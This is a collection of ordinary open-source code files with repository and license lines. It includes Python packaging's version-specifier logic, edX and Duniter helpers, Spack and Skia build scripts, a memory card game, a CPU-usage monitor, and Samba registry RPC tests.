# Convert our spec string into a Version
spec = Version(spec)
# If the specifier does not have a local segment, then we want to
# act as if the prospective version also does not have a local
# segment.
if not spec.local:
prospective = Version(prospective.public)
return prospective == spec
@_require_version_compare
def _compare_not_equal(self, prospective, spec):
return not self._compare_equal(prospective, spec)
@_require_version_compare
def _compare_less_than_equal(self, prospective, spec):
return prospective <= Version(spec)
@_require_version_compare
def _compare_greater_than_equal(self, prospective, spec):
return prospective >= Version(spec)
@_require_version_compare
def _compare_less_than(self, prospective, spec):
# Convert our spec to a Version instance, since we'll want to work with
# it as a version.
spec = Version(spec)
# Check to see if the prospective version is less than the spec
# version. If it's not we can short circuit and just return False now
# instead of doing extra unneeded work.
if not prospective < spec:
return False
# This special case is here so that, unless the specifier itself
# includes is a pre-release version, that we do not accept pre-release
# versions for the version mentioned in the specifier (e.g. <3.1 should
# not match 3.1.dev0, but should match 3.0.dev0).
if not spec.is_prerelease and prospective.is_prerelease:
if Version(prospective.base_version) == Version(spec.base_version):
return False
# If we've gotten to here, it means that prospective version is both
# less than the spec version *and* it's not a pre-release of the same
# version in the spec.
return True
@_require_version_compare
def _compare_greater_than(self, prospective, spec):
# Convert our spec to a Version instance, since we'll want to work with
# it as a version.
spec = Version(spec)
# Check to see if the prospective version is greater than the spec
# version. If it's not we can short circuit and just return False now
# instead of doing extra unneeded work.
if not prospective > spec:
return False
# This special case is here so that, unless the specifier itself
# includes is a post-release version, that we do not accept
# post-release versions for the version mentioned in the specifier
# (e.g. >3.1 should not match 3.0.post0, but should match 3.2.post0).
if not spec.is_postrelease and prospective.is_postrelease:
if Version(prospective.base_version) == Version(spec.base_version):
return False
# Ensure that we do not allow a local version of the version mentioned
# in the specifier, which is techincally greater than, to match.
if prospective.local is not None:
if Version(prospective.base_version) == Version(spec.base_version):
return False
# If we've gotten to here, it means that prospective version is both
# greater than the spec version *and* it's not a pre-release of the
# same version in the spec.
return True
def _compare_arbitrary(self, prospective, spec):
return str(prospective).lower() == str(spec).lower()
@property
def prereleases(self):
# If there is an explicit prereleases set for this, then we'll just
# blindly use that.
if self._prereleases is not None:
return self._prereleases
# Look at all of our specifiers and determine if they are inclusive
# operators, and if they are if they are including an explicit
# prerelease.
operator, version = self._spec
if operator in ["==", ">=", "<=", "~=", "==="]:
# The == specifier can include a trailing .*, if it does we
# want to remove before parsing.
if operator == "==" and version.endswith(".*"):
version = version[:-2]
# Parse the version, and if it is a pre-release than this
# specifier allows pre-releases.
if parse(version).is_prerelease:
return True
return False
@prereleases.setter
def prereleases(self, value):
self._prereleases = value
_prefix_regex = re.compile(r"^([0-9]+)((?:a|b|c|rc)[0-9]+)$")
def _version_split(version):
result = []
for item in version.split("."):
match = _prefix_regex.search(item)
if match:
result.extend(match.groups())
else:
result.append(item)
return result
def _pad_version(left, right):
left_split, right_split = [], []
# Get the release segment of our versions
left_split.append(list(itertools.takewhile(lambda x: x.isdigit(), left)))
right_split.append(list(itertools.takewhile(lambda x: x.isdigit(), right)))
# Get the rest of our versions
left_split.append(left[len(left_split[0]):])
right_split.append(right[len(right_split[0]):])
# Insert our padding
left_split.insert(
1,
["0"] * max(0, len(right_split[0]) - len(left_split[0])),
)
right_split.insert(
1,
["0"] * max(0, len(left_split[0]) - len(right_split[0])),
)
return (
list(itertools.chain(*left_split)),
list(itertools.chain(*right_split)),
)
class SpecifierSet(BaseSpecifier):
def __init__(self, specifiers="", prereleases=None):
# Split on , to break each indidivual specifier into it's own item, and
# strip each item to remove leading/trailing whitespace.
specifiers = [s.strip() for s in specifiers.split(",") if s.strip()]
# Parsed each individual specifier, attempting first to make it a
# Specifier and falling back to a LegacySpecifier.
parsed = set()
for specifier in specifiers:
try:
parsed.add(Specifier(specifier))
except InvalidSpecifier:
parsed.add(LegacySpecifier(specifier))
# Turn our parsed specifiers into a frozen set and save them for later.
self._specs = frozenset(parsed)
# Store our prereleases value so we can use it later to determine if
# we accept prereleases or not.
self._prereleases = prereleases
def __repr__(self):
pre = (
", prereleases={0!r}".format(self.prereleases)
if self._prereleases is not None
else ""
)
return "<SpecifierSet({0!r}{1})>".format(str(self), pre)
def __str__(self):
return ",".join(sorted(str(s) for s in self._specs))
def __hash__(self):
return hash(self._specs)
def __and__(self, other):
if isinstance(other, string_types):
other = SpecifierSet(other)
elif not isinstance(other, SpecifierSet):
return NotImplemented
specifier = SpecifierSet()
specifier._specs = frozenset(self._specs | other._specs)
if self._prereleases is None and other._prereleases is not None:
specifier._prereleases = other._prereleases
elif self._prereleases is not None and other._prereleases is None:
specifier._prereleases = self._prereleases
elif self._prereleases == other._prereleases:
specifier._prereleases = self._prereleases
else:
raise ValueError(
"Cannot combine SpecifierSets with True and False prerelease "
"overrides."
)
return specifier
def __eq__(self, other):
if isinstance(other, string_types):
other = SpecifierSet(other)
elif isinstance(other, _IndividualSpecifier):
other = SpecifierSet(str(other))
elif not isinstance(other, SpecifierSet):
return NotImplemented
return self._specs == other._specs
def __ne__(self, other):
if isinstance(other, string_types):
other = SpecifierSet(other)
elif isinstance(other, _IndividualSpecifier):
other = SpecifierSet(str(other))
elif not isinstance(other, SpecifierSet):
return NotImplemented
return self._specs != other._specs
def __len__(self):
return len(self._specs)
def __iter__(self):
return iter(self._specs)
@property
def prereleases(self):
# If we have been given an explicit prerelease modifier, then we'll
# pass that through here.
if self._prereleases is not None:
return self._prereleases
# If we don't have any specifiers, and we don't have a forced value,
# then we'll just return None since we don't know if this should have
# pre-releases or not.
if not self._specs:
return None
# Otherwise we'll see if any of the given specifiers accept
# prereleases, if any of them do we'll return True, otherwise False.
return any(s.prereleases for s in self._specs)
@prereleases.setter
def prereleases(self, value):
self._prereleases = value
def __contains__(self, item):
return self.contains(item)
def contains(self, item, prereleases=None):
# Ensure that our item is a Version or LegacyVersion instance.
if not isinstance(item, (LegacyVersion, Version)):
item = parse(item)
# Determine if we're forcing a prerelease or not, if we're not forcing
# one for this particular filter call, then we'll use whatever the
# SpecifierSet thinks for whether or not we should support prereleases.
if prereleases is None:
prereleases = self.prereleases
# We can determine if we're going to allow pre-releases by looking to
# see if any of the underlying items supports them. If none of them do
# and this item is a pre-release then we do not allow it and we can
# short circuit that here.
# Note: This means that 1.0.dev1 would not be contained in something
# like >=1.0.devabc however it would be in >=1.0.debabc,>0.0.dev0
if not prereleases and item.is_prerelease:
return False
# We simply dispatch to the underlying specs here to make sure that the
# given version is contained within all of them.
# Note: This use of all() here means that an empty set of specifiers
# will always return True, this is an explicit design decision.
return all(
s.contains(item, prereleases=prereleases)
for s in self._specs
)
def filter(self, iterable, prereleases=None):
# Determine if we're forcing a prerelease or not, if we're not forcing
# one for this particular filter call, then we'll use whatever the
# SpecifierSet thinks for whether or not we should support prereleases.
if prereleases is None:
prereleases = self.prereleases
# If we have any specifiers, then we want to wrap our iterable in the
# filter method for each one, this will act as a logical AND amongst
# each specifier.
if self._specs:
for spec in self._specs:
iterable = spec.filter(iterable, prereleases=bool(prereleases))
return iterable
# If we do not have any specifiers, then we need to have a rough filter
# which will filter out any pre-releases, unless there are no final
# releases, and which will filter out LegacyVersion in general.
else:
filtered = []
found_prereleases = []
for item in iterable:
# Ensure that we some kind of Version class for this item.
if not isinstance(item, (LegacyVersion, Version)):
parsed_version = parse(item)
else:
parsed_version = item
# Filter out any item which is parsed as a LegacyVersion
if isinstance(parsed_version, LegacyVersion):
continue
# Store any item which is a pre-release for later unless we've
# already found a final version or we are accepting prereleases
if parsed_version.is_prerelease and not prereleases:
if not filtered:
found_prereleases.append(item)
else:
filtered.append(item)
# If we've found no items except for pre-releases, then we'll go
# ahead and use the pre-releases
if not filtered and found_prereleases and prereleases is None:
return found_prereleases
return filtered
| mit |
openiitbombayx/edx-platform | cms/djangoapps/course_creators/views.py | 230 | 3176 | """
Methods for interacting programmatically with the user creator table.
"""
from course_creators.models import CourseCreator
from student.roles import CourseCreatorRole
from student import auth
def add_user_with_status_unrequested(user):
"""
Adds a user to the course creator table with status 'unrequested'.
If the user is already in the table, this method is a no-op
(state will not be changed).
If the user is marked as is_staff, this method is a no-op (user
will not be added to table).
"""
_add_user(user, CourseCreator.UNREQUESTED)
def add_user_with_status_granted(caller, user):
"""
Adds a user to the course creator table with status 'granted'.
If appropriate, this method also adds the user to the course creator group maintained by authz.py.
Caller must have staff permissions.
If the user is already in the table, this method is a no-op
(state will not be changed).
If the user is marked as is_staff, this method is a no-op (user
will not be added to table, nor added to authz.py group).
"""
if _add_user(user, CourseCreator.GRANTED):
update_course_creator_group(caller, user, True)
def update_course_creator_group(caller, user, add):
"""
Method for adding and removing users from the creator group.
Caller must have staff permissions.
"""
if add:
auth.add_users(caller, CourseCreatorRole(), user)
else:
auth.remove_users(caller, CourseCreatorRole(), user)
def get_course_creator_status(user):
"""
Returns the status for a particular user, or None if user is not in the table.
Possible return values are:
'unrequested' = user has not requested course creation rights
'pending' = user has requested course creation rights
'granted' = user has been granted course creation rights
'denied' = user has been denied course creation rights
None = user does not exist in the table
"""
user = CourseCreator.objects.filter(user=user)
if user.count() == 0:
return None
else:
# User is defined to be unique, can assume a single entry.
return user[0].state
def user_requested_access(user):
"""
User has requested course creator access.
This changes the user state to CourseCreator.PENDING, unless the user
state is already CourseCreator.GRANTED, in which case this method is a no-op.
"""
user = CourseCreator.objects.get(user=user)
if user.state != CourseCreator.GRANTED:
user.state = CourseCreator.PENDING
user.save()
def _add_user(user, state):
"""
Adds a user to the course creator table with the specified state.
Returns True if user was added to table, else False.
If the user is already in the table, this method is a no-op
(state will not be changed, method will return False).
If the user is marked as is_staff, this method is a no-op (False will be returned).
"""
if not user.is_staff and CourseCreator.objects.filter(user=user).count() == 0:
entry = CourseCreator(user=user, state=state)
entry.save()
return True
return False
| agpl-3.0 |
vtexier/duniter-python-api | duniterpy/key/encryption_key.py | 1 | 1634 | """
duniter public and private keys
@author: inso
"""
import libnacl.public
from pylibscrypt import scrypt
from .base58 import Base58Encoder
from .signing_key import _ensure_bytes
SEED_LENGTH = 32 # Length of the key
crypto_sign_BYTES = 64
SCRYPT_PARAMS = {'N': 4096,
'r': 16,
'p': 1
}
class SecretKey(libnacl.public.SecretKey):
def __init__(self, salt, password):
salt = _ensure_bytes(salt)
password = _ensure_bytes(password)
seed = scrypt(password, salt,
SCRYPT_PARAMS['N'], SCRYPT_PARAMS['r'], SCRYPT_PARAMS['p'],
SEED_LENGTH)
super().__init__(seed)
self.public_key = PublicKey(Base58Encoder.encode(self.pk))
def encrypt(self, pubkey, noonce, text):
text_bytes = _ensure_bytes(text)
noonce_bytes = _ensure_bytes(noonce)
recipient_pubkey = PublicKey(pubkey)
crypt_bytes = libnacl.public.Box(self, recipient_pubkey).encrypt(text_bytes, noonce_bytes)
return Base58Encoder.encode(crypt_bytes[24:])
def decrypt(self, pubkey, noonce, text):
sender_pubkey = PublicKey(pubkey)
noonce_bytes = _ensure_bytes(noonce)
encrypt_bytes = Base58Encoder.decode(text)
decrypt_bytes = libnacl.public.Box(self, sender_pubkey).decrypt(encrypt_bytes, noonce_bytes)
return decrypt_bytes.decode('utf-8')
class PublicKey(libnacl.public.PublicKey):
def __init__(self, pubkey):
key = Base58Encoder.decode(pubkey)
super().__init__(key)
def base58(self):
return Base58Encoder.encode(self.pk)
| gpl-3.0 |
tmerrick1/spack | var/spack/repos/builtin/packages/py-packaging/package.py | 5 | 2098 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyPackaging(PythonPackage):
"""Core utilities for Python packages."""
homepage = "https://github.com/pypa/packaging"
url = "https://pypi.io/packages/source/p/packaging/packaging-17.1.tar.gz"
import_modules = ['packaging']
version('17.1', '8baf8241d1b6b0a5fae9b00f359976a8')
version('16.8', '53895cdca04ecff80b54128e475b5d3b')
# Not needed for the installation, but used at runtime
depends_on('py-six', type='run')
depends_on('py-pyparsing', type='run')
# Newer versions of setuptools require packaging. Although setuptools is an
# optional dependency of packaging, if it is not found, setup.py will
# fallback on distutils.core instead. Don't add a setuptools dependency
# or we won't be able to bootstrap setuptools.
# depends_on('py-setuptools', type='build')
| lgpl-2.1 |
Igalia/skia | platform_tools/android/bin/gyp_to_android.py | 44 | 8982 | #!/usr/bin/python
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Script for generating the Android framework's version of Skia from gyp
files.
"""
import argparse
import os
import shutil
import sys
import tempfile
# Find the top of trunk
SCRIPT_DIR = os.path.abspath(os.path.dirname(__file__))
SKIA_DIR = os.path.normpath(os.path.join(SCRIPT_DIR, os.pardir, os.pardir,
os.pardir))
# Find the directory with our helper files, and add it to the path.
ANDROID_TOOLS = os.path.join(SKIA_DIR, 'platform_tools', 'android')
sys.path.append(ANDROID_TOOLS)
import gyp_gen.android_framework_gyp as android_framework_gyp
import gyp_gen.gypd_parser as gypd_parser
import gyp_gen.generate_user_config as generate_user_config
import gyp_gen.makefile_writer as makefile_writer
import gyp_gen.tool_makefile_writer as tool_makefile_writer
import gyp_gen.vars_dict_lib as vars_dict_lib
# Folder containing all gyp files and generated gypd files.
GYP_FOLDER = 'gyp'
def generate_var_dict(target_dir, target_file, skia_arch_type, have_neon,
gyp_source_dir):
"""Create a VarsDict for a particular arch type.
Each paramater is passed directly to android_framework_gyp.main().
Args:
target_dir: Directory containing gyp files.
target_file: Target gyp file.
skia_arch_type: Target architecture.
have_neon: Whether the target should build for neon.
gyp_source_dir: Directory for gyp source.
Returns:
A VarsDict containing the variable definitions determined by gyp.
"""
result_file = android_framework_gyp.main(target_dir, target_file,
skia_arch_type, have_neon,
gyp_source_dir)
var_dict = vars_dict_lib.VarsDict()
gypd_parser.parse_gypd(var_dict, result_file, '.')
android_framework_gyp.clean_gypd_files(target_dir)
print '.',
return var_dict
def main(target_dir=None, require_sk_user_config=False, gyp_source_dir=None):
"""Create Android.mk for the Android framework's external/skia.
Builds Android.mk using Skia's gyp files.
Args:
target_dir: Directory in which to place 'Android.mk'. If None, the file
will be placed in skia's root directory.
require_sk_user_config: If True, raise an AssertionError if
SkUserConfig.h does not exist.
gyp_source_dir: Source directory for gyp.
"""
# Create a temporary folder to hold gyp and gypd files. Create it in SKIA_DIR
# so that it is a sibling of gyp/, so the relationships between gyp files and
# other files (e.g. platform_tools/android/gyp/dependencies.gypi, referenced
# by android_deps.gyp as a relative path) is unchanged.
# Use mkdtemp to find an unused folder name, but then delete it so copytree
# can be called with a non-existent directory.
tmp_folder = tempfile.mkdtemp(dir=SKIA_DIR)
os.rmdir(tmp_folder)
shutil.copytree(os.path.join(SKIA_DIR, GYP_FOLDER), tmp_folder)
try:
main_gyp_file = 'android_framework_lib.gyp'
print 'Creating Android.mk',
# Generate a separate VarsDict for each architecture type. For each
# archtype:
# 1. call android_framework_gyp.main() to generate gypd files
# 2. call parse_gypd to read those gypd files into the VarsDict
# 3. delete the gypd files
#
# Once we have the VarsDict for each architecture type, we combine them all
# into a single Android.mk file, which can build targets of any
# architecture type.
# The default uses a non-existant archtype, to find all the general
# variable definitions.
default_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'other',
False, gyp_source_dir)
arm_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm', False,
gyp_source_dir)
arm_neon_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm',
True, gyp_source_dir)
x86_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'x86', False,
gyp_source_dir)
x86_64_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'x86_64',
False, gyp_source_dir)
mips_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'mips', False,
gyp_source_dir)
mips64_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'mips64',
False, gyp_source_dir)
arm64_var_dict = generate_var_dict(tmp_folder, main_gyp_file, 'arm64',
False, gyp_source_dir)
# Compute the intersection of all targets. All the files in the intersection
# should be part of the makefile always. Each dict will now contain trimmed
# lists containing only variable definitions specific to that configuration.
var_dict_list = [default_var_dict, arm_var_dict, arm_neon_var_dict,
x86_var_dict, x86_64_var_dict, mips_var_dict,
mips64_var_dict, arm64_var_dict]
common = vars_dict_lib.intersect(var_dict_list)
common.LOCAL_MODULE.add('libskia')
# Create SkUserConfig
user_config = os.path.join(SKIA_DIR, 'include', 'config', 'SkUserConfig.h')
if target_dir:
dst_dir = target_dir
else:
dst_dir = os.path.join(SKIA_DIR, 'include', 'core')
generate_user_config.generate_user_config(
original_sk_user_config=user_config,
require_sk_user_config=require_sk_user_config, target_dir=dst_dir,
defines=common.DEFINES)
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='bench.gyp',
skia_trunk=target_dir,
dest_dir='bench',
skia_lib_var_dict=common,
local_module_name='skia_nanobench',
local_module_tags=['tests'],
desired_targets=['nanobench'],
gyp_source_dir=gyp_source_dir)
tool_makefile_writer.generate_tool(gyp_dir=tmp_folder,
target_file='dm.gyp',
skia_trunk=target_dir,
dest_dir='dm',
skia_lib_var_dict=common,
local_module_name='skia_dm',
local_module_tags=['tests'],
desired_targets=['dm'],
gyp_source_dir=gyp_source_dir)
# Now that the defines have been written to SkUserConfig and they've been
# used to skip adding them to the tools makefiles, they are not needed in
# Android.mk. Reset DEFINES.
common.DEFINES.reset()
# Further trim arm_neon_var_dict with arm_var_dict. After this call,
# arm_var_dict (which will now be the intersection) includes all definitions
# used by both arm and arm + neon, and arm_neon_var_dict will only contain
# those specific to arm + neon.
arm_var_dict = vars_dict_lib.intersect([arm_var_dict, arm_neon_var_dict])
# Now create a list of VarsDictData holding everything but common.
deviations_from_common = []
deviations_from_common.append(makefile_writer.VarsDictData(
arm_var_dict, 'arm'))
deviations_from_common.append(makefile_writer.VarsDictData(
arm_neon_var_dict, 'arm', 'ARCH_ARM_HAVE_NEON'))
deviations_from_common.append(makefile_writer.VarsDictData(x86_var_dict,
'x86'))
deviations_from_common.append(makefile_writer.VarsDictData(x86_64_var_dict,
'x86_64'))
deviations_from_common.append(makefile_writer.VarsDictData(mips_var_dict,
'mips'))
deviations_from_common.append(makefile_writer.VarsDictData(mips64_var_dict,
'mips64'))
deviations_from_common.append(makefile_writer.VarsDictData(arm64_var_dict,
'arm64'))
makefile_writer.write_android_mk(target_dir=target_dir,
common=common, deviations_from_common=deviations_from_common)
finally:
shutil.rmtree(tmp_folder)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gyp_source_dir', help='Source of gyp program. '
'e.g. <path_to_skia>/third_party/externals/gyp')
args = parser.parse_args()
main(gyp_source_dir=args.gyp_source_dir)
| bsd-3-clause |
mr-ice/pipython | InteractiveProgramming/concentration.py | 1 | 7657 | # implementation of card game - Memory
# I originally coded this with timers for hiding the cards instead of hiding them
# on a mouse click. And I removed cards that matched instead of leaving them face up.
# I thought it worked pretty well but it didn't meet the requirements of the grading
# rubrick, so I had to make changes. If you want to see that code, you can see it at
# http://www.codeskulptor.org/#user39_efDZwo8MIu_0.py
import simplegui
import random
from math import sqrt
cards = list() # list to hold the cards
card_size = 75 # x dimension of card (y dimension is calculated based on this)
margins = ( 20, 20 ) # spacing around edges
pad = ( 10, 10 ) # intercard spacing
##showtime = 700 # number of milliseconds to show revealed, unmatched cards
##matchtime = 350 # number of milliseconds to show revealed, matched cards
fontsize = 35 # size of the font for card faces
game = {
'over' : False,
'best' : 0,
'draws' : 0,
'drawn' : None,
'match' : None,
}
game_over_text = "Game Over!"
animated = False
animation_tick = 0
w = card_size # width of a card is the card_size
h = ((1 + sqrt(5)) / 2 ) *card_size # height of a card is phi times width
canvaswidth = margins[0] + 4 * (w + pad[0]) + margins[0]/2
canvasheight = margins[1] + 4 * (h + pad[1]) + margins[1]/2
for x in range(4):
for y in range(4):
xpos = margins[0] + x * ( w + pad[0] ) - 0.5
ypos = margins[1] + y * ( h + pad[1] ) - 0.5
# remember: x is horizontal offset, y is vertical offset
cards.append( { 'location' : { 'x' : xpos, 'y' : ypos },
'value' : 'A',
'size' : { 'x' : w, 'y' : h },
'face' : False,
'color' : '#990033',
'fill' : '#009933',
'fontcolor' : 'yellow',
'fontsize' : fontsize,
'linewidth' : 2,
'drawn' : True,
})
def initialize_cards():
global cards
card_values = range(8) + range(8)
random.shuffle(card_values)
for i in range(len(card_values)):
cards[i]['value'] = card_values[i]
cards[i]['face'] = False
cards[i]['drawn'] = True
def draw_card( card, canvas ):
if not card['drawn']: return
x = card['location']['x']
y = card['location']['y']
w = card['size']['x']
h = card['size']['y']
# location of this card, set of points describing a rectangle
loc = [
( x, y ),
( x, y+h ),
( x+w, y+h ),
( x+w, y),
]
# decoration on this card, set of points describing a diamond in the rectangle
dec = [
( x + w/2, y ),
( x + w, y + h/2 ),
( x + w/2, y + h ),
( x, y + h/2 ),
]
tx = x + w/2 - card['fontsize']/4
ty = y + h/2 + card['fontsize']/4
canvas.draw_polygon(loc, card['linewidth'], card['color'], card['fill'])
if card['face']:
canvas.draw_text(str(card['value']), (tx,ty), card['fontsize'], card['fontcolor'])
else:
canvas.draw_polygon(dec, card['linewidth'], card['color'])
canvas.draw_text("?", (tx, ty), card['fontsize'], card['color'])
def hide_all():
for card in cards:
card['face'] = False
if showtimer.is_running(): showtimer.stop()
def show_all():
for card in cards:
card['face'] = True
if showtimer.is_running(): showtimer.stop()
def hide_matches():
game['drawn']['drawn'] = False
game['drawn'] = False
game['match']['drawn'] = False
game['match'] = False
if matchtimer.is_running(): matchtimer.stop()
any = False
for card in cards:
any = any or card['drawn']
if not any:
if game['draws'] < game['best'] or game['best'] == 0: game['best'] = game['draws']
game['over'] = True
animationtimer.start()
# helper function to initialize globals
def new_game():
global animation_tick
initialize_cards()
game['draws'] = 0
game['drawn'] = False
game['match'] = False
game['over'] = False
## if showtimer.is_running(): showtimer.stop()
## if matchtimer.is_running(): matchtimer.stop()
if animationtimer.is_running(): animationtimer.stop()
animation_tick = 0
def clicked(card,pos):
if not card['drawn'] or card['face']: return False
x = card['location']['x']
y = card['location']['y']
w = card['size']['x']
h = card['size']['y']
return not ( pos[0] < x or pos[0] > x + w or pos[1] < y or pos[1] > y + h )
# define event handlers
def mouseclick(pos):
# add game state logic here
global cards, hidetimer, showtimer
## if showtimer.is_running() or matchtimer.is_running() or animated: return
if animated: return
all = True
for card in cards:
if clicked(card,pos):
card['face'] = True
if game['drawn'] and game['match']:
if game['drawn']['value'] != game['match']['value']:
game['drawn']['face'] = False
game['match']['face'] = False
game['drawn'] = None
game['match'] = None
if not game['drawn']:
game['drawn'] = card
elif not game['match']:
game['match'] = card
game['draws'] += 1
all = all and card['face']
if all:
if game['draws'] < game['best'] or game['best'] == 0: game['best'] = game['draws']
for card in cards:
card['drawn'] = False
game['over'] = True
animationtimer.start()
# cards are logically 50x100 pixels in size (or not, I set mine differently, above)
def draw(canvas):
global game_over
for card in cards:
draw_card(card,canvas)
label.set_text("Turns = " + str(game['draws']))
if game['best'] > 0:
best.set_text("Best = " + str(game['best']))
if game['over']:
game_over_width = frame.get_canvas_textwidth(game_over_text, animation_tick)
canvas.draw_text(game_over_text, ( canvaswidth/2 - game_over_width/2,
canvasheight/2 ), animation_tick, "red" )
if animation_tick >= fontsize*2:
animationtimer.stop()
def animation():
global animation_tick
animation_tick += 1
def game_over():
"""Prematurely end the game for debugging"""
for card in cards:
card['drawn'] = False
animationtimer.start()
game['over'] = True
# create frame and add a button and labels
frame = simplegui.create_frame("Concentration", canvaswidth, canvasheight)
line = frame.add_label("----------------------------")
label = frame.add_label("Turns = 0")
best = frame.add_label("Best = 0")
line = frame.add_label("----------------------------")
frame.add_button("Reset", new_game)
line = frame.add_label("----------------------------")
#line = frame.add_label("----------DEBUGGING---------")
#frame.add_button("Show All", show_all)
#frame.add_button("Hide All", hide_all)
#frame.add_button("Animate", animation)
#frame.add_button("Game Over", game_over)
# register event handlers
frame.set_mouseclick_handler(mouseclick)
frame.set_draw_handler(draw)
##showtimer = simplegui.create_timer(showtime,hide_all)
##matchtimer = simplegui.create_timer(matchtime,hide_matches)
animationtimer = simplegui.create_timer(10,animation)
# get things rolling
new_game()
frame.start()
# Always remember to review the grading rubric
| mit |
sbates130272/fio-stuff | tools/cpuperf.py | 1 | 3479 | #!/usr/bin/env python
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import subprocess as sp
import time
def get_ps_data(options):
try:
data = sp.check_output(["ps", "-C", options.command, "-o" "%cpu=,%mem="])
if options.multithread:
temp = tuple(float(x) for x in data.split())
data = (sum(temp[::2]), sum(temp[1::2]))
else:
data = tuple(float(x) for x in data.split()[0:2])
except sp.CalledProcessError:
if (options.skip):
data=None
else:
data = 0.,0.
return data
class HostData(object):
def __init__(self):
self.last_total = None
self.last_time = None
self.clk_tck = os.sysconf(os.sysconf_names['SC_CLK_TCK'])
self.start = self.get_total_usage()
self.start_time = time.time()
def get_total_usage(self):
return sum(float(x) for x in
open("/proc/stat").readline().split()[:3])
def calc_cpu(self, a, b, start_time):
duration = time.time() - start_time
return (a - b) / duration / self.clk_tck
def get_cpu(self):
usage = None
total = self.get_total_usage()
if self.last_total is not None:
usage = self.calc_cpu(total, self.last_total, self.last_time)
self.last_time = time.time()
self.last_total = total
return usage
def get_mem(self):
line = sp.check_output(["free"]).split("\n")[1]
total, used = (int(x) for x in line.split()[1:3])
return float(used) / float(total) * 100.
def __call__(self, *args):
cpu = self.get_cpu()
if cpu is None:
return
return cpu, self.get_mem()
def average(self):
total = self.get_total_usage()
return self.calc_cpu(total, self.start, self.start_time)
if __name__=="__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-C", "--command", action="store",
help="The command to look for in the ps log.", default=None)
parser.add_argument("-t", "--time", action="store", type=int,
help="Time to run for in seconds (-1 to run forever)", default=-1)
parser.add_argument("-w", "--wait", action="store", type=int,
help="Wait time in ms between calls to ps.", default=100)
parser.add_argument("-s", "--skip", action="store_true",
help="Only output data when command is running.")
parser.add_argument("-m", "--multithread", action="store_true",
help="Treat the process as a multi-threaded one when calling ps.")
options = parser.parse_args()
if not options.command:
get_data = HostData()
else:
get_data = get_ps_data
try:
start_time = time.time()
end_time = start_time + options.time
print("#%7s %3s %3s" % ("TIME", "CPU", "MEM"))
while options.time < 0 or time.time() < end_time:
t = time.time()-start_time
data = get_data(options)
if data:
print("%8.1f %-3.1f %3.1f" % ((t,) + data))
sys.stdout.flush()
time.sleep(options.wait / 1000.)
except KeyboardInterrupt:
print()
if hasattr(get_data, "average"):
print("%-8s %-3.1f" % (("Average", get_data.average())))
| apache-2.0 |
ovnicraft/odoo | addons/l10n_no/__init__.py | 693 | 1057 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
jhrozek/samba-ldb-mdb | python/samba/tests/dcerpc/registry.py | 51 | 1887 | # Unix SMB/CIFS implementation.
# Copyright (C) Jelmer Vernooij <[email protected]> 2008
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Tests for samba.dcerpc.registry."""
from samba.dcerpc import winreg
from samba.tests import RpcInterfaceTestCase
class WinregTests(RpcInterfaceTestCase):
def setUp(self):
super(WinregTests, self).setUp()
self.conn = winreg.winreg("ncalrpc:", self.get_loadparm(),
self.get_credentials())
def get_hklm(self):
return self.conn.OpenHKLM(None,
winreg.KEY_QUERY_VALUE | winreg.KEY_ENUMERATE_SUB_KEYS)
def test_hklm(self):
handle = self.conn.OpenHKLM(None,
winreg.KEY_QUERY_VALUE | winreg.KEY_ENUMERATE_SUB_KEYS)
self.conn.CloseKey(handle)
def test_getversion(self):
handle = self.get_hklm()
version = self.conn.GetVersion(handle)
self.assertEquals(int, version.__class__)
self.conn.CloseKey(handle)
def test_getkeyinfo(self):
handle = self.conn.OpenHKLM(None,
winreg.KEY_QUERY_VALUE | winreg.KEY_ENUMERATE_SUB_KEYS)
x = self.conn.QueryInfoKey(handle, winreg.String())
self.assertEquals(9, len(x)) # should return a 9-tuple
self.conn.CloseKey(handle)
| gpl-3.0 |
